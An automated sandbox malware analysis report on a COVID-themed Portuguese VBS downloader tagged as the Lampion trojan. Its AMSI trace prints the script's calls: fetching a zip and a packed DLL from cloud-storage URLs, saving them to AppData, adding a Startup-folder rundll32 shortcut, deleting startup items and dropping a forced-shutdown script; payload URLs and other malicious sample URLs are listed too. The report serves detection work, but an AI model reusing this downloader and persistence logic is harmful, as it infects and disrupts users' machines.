Loading ...

Play interactive tourEdit tour

Analysis Report Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs

Overview

General Information

Sample Name:Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs
Analysis ID:351167
MD5:bef99a24632c89aa1676f0c5e5bfb11b
SHA1:335c3b6151df7e3e31b603bd55d24c0de56a8d5a
SHA256:64f6d8c5d529aa3ab6626a3b9be57c4b9e0c2130ec3358c12d53e3453a83a76c
Tags:lampiontrojanportugal

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Windows Shell Script Host drops VBS files
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5840 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dllAvira: detection malicious, Label: HEUR/AGEN.1118892
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dllReversingLabs: Detection: 21%
Multi AV Scanner detection for submitted fileShow sources
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbsVirustotal: Detection: 30%Perma Link
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbsReversingLabs: Detection: 17%

Networking:

barindex
Potential malicious VBS script found (has network functionality)Show sources
Source: Initial file: .write UWZGHTNQST.responseBody
Source: Initial file: .savetofile FVWUJVVSEL, 2
Source: Initial file: .write IQSDEMNRXA.responseBody
Source: Initial file: .savetofile DHONGHAMSC, 2
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
Source: wscript.exeString found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exeString found in binary or memory: https://storage.googleapis.com/mystorage2021/P-2-19.dll

System Summary:

barindex
Detected VMProtect packerShow sources
Source: P-2-19[1].dll.0.drStatic PE information: .vmp0 and .vmp1 section names
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbsInitial sample: Strings found which are bigger than 50
Source: P-2-19[1].dll.0.drStatic PE information: Number of sections : 13 > 10
Source: classification engineClassification label: mal100.evad.winVBS@1/5@0/2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\jbnusslocvu.vbsJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs'
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbsVirustotal: Detection: 30%
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbsReversingLabs: Detection: 17%
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\jbnusslocvu.vbs", "true");ITextStream.Write("Set MTTDJRICBE = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\38695955395697");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-2-19.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll J7xmDcvOVJMXsSwGkQO");IWshShortcut.WindowStyle("1");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt");IWshShortcut.Save();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\jbnusslocvu.vbs");ITextStream.ReadAll();ITextStream.Close();IHost.Sleep("300000");ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01000001("6")
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: P-2-19[1].dll.0.drStatic PE information: section name: .didata
Source: P-2-19[1].dll.0.drStatic PE information: section name: .vmp0
Source: P-2-19[1].dll.0.drStatic PE information: section name: .vmp1

Persistence and Installation Behavior:

barindex
Windows Shell Script Host drops VBS filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\jbnusslocvu.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dllJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnkJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Potential evasive VBS script found (sleep loop)Show sources
Source: Initial fileInitial file: GZTGQBVSUV.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exeDropped file: WScript.Sleep(300000)Jump to dropped file
Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dllJump to dropped file
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dllJump to dropped file

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: P-2-19[1].dll.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.217.168.48 187
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting421Startup Items1Startup Items1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Registry Run Keys / Startup Folder2Process Injection1Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsPowerShell1Logon Script (Windows)Registry Run Keys / Startup Folder2Process Injection1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting421NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs31%VirustotalBrowse
Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs17%ReversingLabsScript-WScript.Downloader.SLoad

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll100%AviraHEUR/AGEN.1118892
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll21%ReversingLabsWin32.Malware.Bulz

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
8.8.8.8
unknownUnited States
15169GOOGLEUSfalse
172.217.168.48
unknownUnited States
15169GOOGLEUStrue

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:351167
Start date:10.02.2021
Start time:11:45:40
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 18m 3s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.winVBS@1/5@0/2
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .vbs
Warnings:
Show All
  • Max analysis timeout: 720s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, UsoClient.exe, audiodg.exe, rundll32.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Too many dropped files, some of them have not been restored

Simulations

Behavior and APIs

TimeTypeDescription
11:47:56AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnk

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
8.8.8.8BadStuff.jsGet hashmaliciousBrowse
  • 8.8.8.8/SlvMWdIEW62C9c
BadStuff.jsGet hashmaliciousBrowse
  • 8.8.8.8/CTM5wttwLFcLdHfVk
33payment advice.exeGet hashmaliciousBrowse
  • www.zulinfang.mobi/fu/?id=i07vHMa0svfKfxE6I3aRHA3lctcdYaT9x0iZT9MH0oRhMFPgh9mSEtNU17XFCBgMQA4XWErQDlzTwB-AplygzQ..
37documents.exeGet hashmaliciousBrowse
  • www.tasteofunexpected.com/tf/?id=y6IrbpvfhkYfQXXyqC8dooAvfrv2e2apV7igF70LYGyF4OCvwj5JxRVBdRghvKGGuc_KsFbnbWPC0Def
63AWB 043255.exeGet hashmaliciousBrowse
  • www.serikatsaudagarnusantara.com/ed/?id=kIz4OnF7tHMqdv1cSepeHoY02Vsws5yCI7zf8DN1pvMb9hdHFpZX44eSyhzXC7u5icfl1yYYsvfyl6we
d62c.exeGet hashmaliciousBrowse
  • www.epckednilm.info/fu/?id=i07vHMa0svfKfxE6I3aRHA3lctcdYaT9x0iZT9MH0oRhMFPgh9mSEtNU17XFCBgMQA4XWErQDlzTwB-AplygzQ..
27TTcopyMT107-36000_payment.exeGet hashmaliciousBrowse
  • www.watchsummer.com/tr/?id=oqCXvgIUiCxPFtn1J0rb33q5mpSH48Vd1XRAfBxi4MgNDwsdTt0dcXb5dgzj2vPAuld1RDreAlRWWLP9Xot16w..&sql=1
download_adobeflashplayer_install_9_.exeGet hashmaliciousBrowse
  • wetr34.sitesled.com/wind.jpg
INV-000524.vbsGet hashmaliciousBrowse
  • naturofind.org/p66/JIKJHgft
177Purchase Order.exeGet hashmaliciousBrowse
  • www.phutungototp.com/ho/?id=y3T6nEBciedL7htO4xn1ZYijVAw7sJXLjwubagvJUtMFVf7aOWPSa_Bl5i178f_EjROvybrSr7PC3267XbUsBg..
8Order Inquiry.exeGet hashmaliciousBrowse
  • www.quyuar.com/dr/?id=gCqdDQsh4d7ynFKSj09V1Y12J91NTUfM9LddDKzxEGHO7R4ogEQ3AGAU2DRYiF_Nduo4Rd-EW24x-O38aOud_g..
27Tobye.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
11Marena.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
39Harriot.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
1Vida.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
43Colleen.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
67Roxanne.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
15Winnah.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
33Elfrida.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
25Cornelle.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
GOOGLEUSQwLijaR9ex.exeGet hashmaliciousBrowse
  • 216.239.32.21
pfjgWtj6ms.exeGet hashmaliciousBrowse
  • 34.98.99.30
6Xk6d54hwM.exeGet hashmaliciousBrowse
  • 34.102.136.180
eYwQ9loD5Q.exeGet hashmaliciousBrowse
  • 34.102.136.180
SK8HSWos1p.rtfGet hashmaliciousBrowse
  • 34.102.136.180
MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
order_list_fe99087.xlsGet hashmaliciousBrowse
  • 216.239.32.21
CaAmqz52Yk.exeGet hashmaliciousBrowse
  • 216.239.38.21
E68-STD-239-2020-239.xlsxGet hashmaliciousBrowse
  • 34.98.99.30
RFQ 117839 ASIA TRADING LLC.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
Purchase Order _pdf.exeGet hashmaliciousBrowse
  • 34.102.136.180
Purchase Order _pdf.exeGet hashmaliciousBrowse
  • 34.102.136.180
50.docxGet hashmaliciousBrowse
  • 216.239.36.21
50.docxGet hashmaliciousBrowse
  • 216.239.38.21
DHL Parcel Details.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
SCAN_PO210205.exe.exeGet hashmaliciousBrowse
  • 34.102.136.180
SKM_36721012514070-2.pptGet hashmaliciousBrowse
  • 172.217.22.193
wEcncyxrEeGet hashmaliciousBrowse
  • 34.80.65.54
Y8LGFkFl01Get hashmaliciousBrowse
  • 172.217.22.206
Y8LGFkFl01Get hashmaliciousBrowse
  • 172.217.20.227
GOOGLEUSQwLijaR9ex.exeGet hashmaliciousBrowse
  • 216.239.32.21
pfjgWtj6ms.exeGet hashmaliciousBrowse
  • 34.98.99.30
6Xk6d54hwM.exeGet hashmaliciousBrowse
  • 34.102.136.180
eYwQ9loD5Q.exeGet hashmaliciousBrowse
  • 34.102.136.180
SK8HSWos1p.rtfGet hashmaliciousBrowse
  • 34.102.136.180
MV SEIYO FORTUNE REF 27 - QUOTATION.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
order_list_fe99087.xlsGet hashmaliciousBrowse
  • 216.239.32.21
CaAmqz52Yk.exeGet hashmaliciousBrowse
  • 216.239.38.21
E68-STD-239-2020-239.xlsxGet hashmaliciousBrowse
  • 34.98.99.30
RFQ 117839 ASIA TRADING LLC.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
Purchase Order _pdf.exeGet hashmaliciousBrowse
  • 34.102.136.180
Purchase Order _pdf.exeGet hashmaliciousBrowse
  • 34.102.136.180
50.docxGet hashmaliciousBrowse
  • 216.239.36.21
50.docxGet hashmaliciousBrowse
  • 216.239.38.21
DHL Parcel Details.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
SCAN_PO210205.exe.exeGet hashmaliciousBrowse
  • 34.102.136.180
SKM_36721012514070-2.pptGet hashmaliciousBrowse
  • 172.217.22.193
wEcncyxrEeGet hashmaliciousBrowse
  • 34.80.65.54
Y8LGFkFl01Get hashmaliciousBrowse
  • 172.217.22.206
Y8LGFkFl01Get hashmaliciousBrowse
  • 172.217.20.227

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll
Process:C:\Windows\System32\wscript.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):218698752
Entropy (8bit):7.826191352155413
Encrypted:false
SSDEEP:6291456:Xfaqv49+/8jJXe6lMhuS1qmHeGRv9pyOi6HX4Ks2VYQjafrB7tmbUz:Xfaqw4Oe6ywSES9QiX4K1krBxm
MD5:73613FF2907A65372D31B63F54F0C8C0
SHA1:6D1E1D74EA1577C0DC122A9BDF03B1D0CDC4D098
SHA-256:03EA4C3751E266606857BA8AF7A345D3863B5CC097A8BC2FB02567A24C4BF9A7
SHA-512:7C04A6306C57FCA15E50B073E082C78AADB9AD7EDB85D7FC290114D3BAEC7C7A2F0EF30A531C948AB0DB8BC0779CDA9F2A6EC99B211E2161A02C969E271F5133
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 21%
Reputation:low
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......_.................V&...........I......p&...@................................................................... ......II.@.....I..U....................I.............................|-!. .....................3.......'.h....................text....>&......................... ..`.itext.......P&..................... ..`.data........p&.....................@....bss....tb...@'..........................idata...4....'.....................@....didata.h.....'.....................@....edata........(.....................@..@.rdata..E.....(.....................@..@.vmp0....L... (.....................`....tls.........p@.....................@....vmp1... .....@.....................`....reloc........I.....................@..@.rsrc....U....I.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0[1].zip
Process:C:\Windows\System32\wscript.exe
File Type:Zip archive data, at least v2.0 to extract
Category:dropped
Size (bytes):5604547
Entropy (8bit):7.9999658588506986
Encrypted:true
SSDEEP:98304:d9S705s0m5QhjG5QpiuPreyiI8zRvE5hr1obzUh+AjLI9vekpRqr2n:DR5s0ma1tbrmI4agzw+Ajk9vezrK
MD5:F6F9C197DE97000E33113089993889A8
SHA1:9EF214E6077BAF24057AE37DC971C4D80DB983C4
SHA-256:88643A7FC5653791841207C713EA290A1D0A0264B37A7D3B031815E52211BB09
SHA-512:B9584A343544ADC8A4707DE198FE3FE83AE5C7C9B52C73743EACBEE2F867E4A716EBB89135B2E7E9C46506DD9EEF1A2B1BF0ECD8EDB1C1F5B4DD5F2C97DD3C5E
Malicious:false
Reputation:low
Preview: PK..........8R..+..U...Y.'................<.)......*.........B\.o..J.~..8.4.z.H.."qF...(...&.....t[,^(^..5...#QJ.Kk..9.....P.....9..MQ...~.>.z..98.q......o.......y.gA.(w......>.l".p..1.Ts...h...w..%...<..0Q=..y._...O4x......1.z..i'Z0..{...>).Yla......"...c....d....$7L#w....8.p#Zz.h.M..F.c.r.+.p..:!.CC..L.....C.v.#..........^d/N.*h.`...O...g.b0[T..Ou..l.S..Q..{..-^n....Jo.R....u............C?...E.P..x.*R_.9C..\....pYy.{.w...Y...UL..z..M.J8...[W.>N../.=a.FP.N.K.,.?}...bs.....S,..^..%......O?+...9.d.....(A.-l.....8.[...0...x..=...5...&...^t..0 ...(...%.R$.....Xq..0.!..w..q....<...........'.....lSI.C.g.E..$.(D..8.K..L..S]f.s...X...tMy.`ei.....7;j.!i.=......#....].)...s.g7...f.......^..)....C..C8...~..P..|.D..g%.j.G.~..L...{.y.3.T."B..M....`...zE.`.Yj........y...........E..Q...$./.E_.YV..bS...Q..j..i.4`.w..Q..7.Q.q\v..}.......<4.P.6#M*.3.....J.C.?.[}..N..K.,.v.|.....b....]*.W%.E......R.@..sh>S....w.*.#.3.Y.<.....]l.
C:\Users\user\AppData\Roaming\0.zip
Process:C:\Windows\System32\wscript.exe
File Type:Zip archive data, at least v2.0 to extract
Category:dropped
Size (bytes):5604547
Entropy (8bit):7.9999658588506986
Encrypted:true
SSDEEP:98304:d9S705s0m5QhjG5QpiuPreyiI8zRvE5hr1obzUh+AjLI9vekpRqr2n:DR5s0ma1tbrmI4agzw+Ajk9vezrK
MD5:F6F9C197DE97000E33113089993889A8
SHA1:9EF214E6077BAF24057AE37DC971C4D80DB983C4
SHA-256:88643A7FC5653791841207C713EA290A1D0A0264B37A7D3B031815E52211BB09
SHA-512:B9584A343544ADC8A4707DE198FE3FE83AE5C7C9B52C73743EACBEE2F867E4A716EBB89135B2E7E9C46506DD9EEF1A2B1BF0ECD8EDB1C1F5B4DD5F2C97DD3C5E
Malicious:true
Reputation:low
Preview: PK..........8R..+..U...Y.'................<.)......*.........B\.o..J.~..8.4.z.H.."qF...(...&.....t[,^(^..5...#QJ.Kk..9.....P.....9..MQ...~.>.z..98.q......o.......y.gA.(w......>.l".p..1.Ts...h...w..%...<..0Q=..y._...O4x......1.z..i'Z0..{...>).Yla......"...c....d....$7L#w....8.p#Zz.h.M..F.c.r.+.p..:!.CC..L.....C.v.#..........^d/N.*h.`...O...g.b0[T..Ou..l.S..Q..{..-^n....Jo.R....u............C?...E.P..x.*R_.9C..\....pYy.{.w...Y...UL..z..M.J8...[W.>N../.=a.FP.N.K.,.?}...bs.....S,..^..%......O?+...9.d.....(A.-l.....8.[...0...x..=...5...&...^t..0 ...(...%.R$.....Xq..0.!..w..q....<...........'.....lSI.C.g.E..$.(D..8.K..L..S]f.s...X...tMy.`ei.....7;j.!i.=......#....].)...s.g7...f.......^..)....C..C8...~..P..|.D..g%.j.G.~..L...{.y.3.T."B..M....`...zE.`.Yj........y...........E..Q...$./.E_.YV..bS...Q..j..i.4`.w..Q..7.Q.q\v..}.......<4.P.6#M*.3.....J.C.?.[}..N..K.,.v.|.....b....]*.W%.E......R.@..sh>S....w.*.#.3.Y.<.....]l.
C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll
Process:C:\Windows\System32\wscript.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):76611584
Entropy (8bit):7.827756829056121
Encrypted:false
SSDEEP:1572864:oStQ6aSa5ZZWo440iMlAtGVF8vfjJXtORkH81MvmvXolFU/huUNTz71axVyZ9DHn:XtQ6a9Eo449MlSG/8njJXtO5e/lFWhug
MD5:2337870D92D47375B4E9C6E94FD56098
SHA1:7F49AB1AFC4262961E0F369061D982193614A599
SHA-256:5BDA50B89E18DE37C6BF7E4B6D6F723D32E92BC9A3248351386C2A1694824AD1
SHA-512:BC0931A4C4DB982B9A39089CBE9BD09508CFDDD33BDEFF3D9C180A9D095E10CD621914F78CB3B302E5711B06AC7E8BA174BEA009E624DAA114BEB96BD390C2E1
Malicious:true
Reputation:low
Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......_.................V&...........I......p&...@................................................................... ......II.@.....I..U....................I.............................|-!. .....................3.......'.h....................text....>&......................... ..`.itext.......P&..................... ..`.data........p&.....................@....bss....tb...@'..........................idata...4....'.....................@....didata.h.....'.....................@....edata........(.....................@..@.rdata..E.....(.....................@..@.vmp0....L... (.....................`....tls.........p@.....................@....vmp1... .....@.....................`....reloc........I.....................@..@.rsrc....U....I.
C:\Users\user\AppData\Roaming\jbnusslocvu.vbs
Process:C:\Windows\System32\wscript.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):296
Entropy (8bit):5.248345507870898
Encrypted:false
SSDEEP:6:jwHnPqhNGXIkKnFkjqvAATbKZkXOyMz6gCggPsjJRXvexOvXKgIi8Ny:sHnChNGYkKnFPvAOKZy8MHsjJRvyOdB
MD5:FFD5B69483FACBB5C2A9E4E57100AA2B
SHA1:1388A7CB1D74670CD34A565DD6FE0803C5AF6D94
SHA-256:361932AA4CAEA0CEE67D0810EEB8A2EDACE52E2219DCAD6E43E8EF64266C0D53
SHA-512:CB8989D92B3265DCF5ADA91C7C94B04DE7AE7BBADE3A5A0D2AC0EF40CCA891413F606E56181A7CC9297320EC67C9CAC2027958686CE4F7FC668A3F471EA2F9CA
Malicious:true
Reputation:low
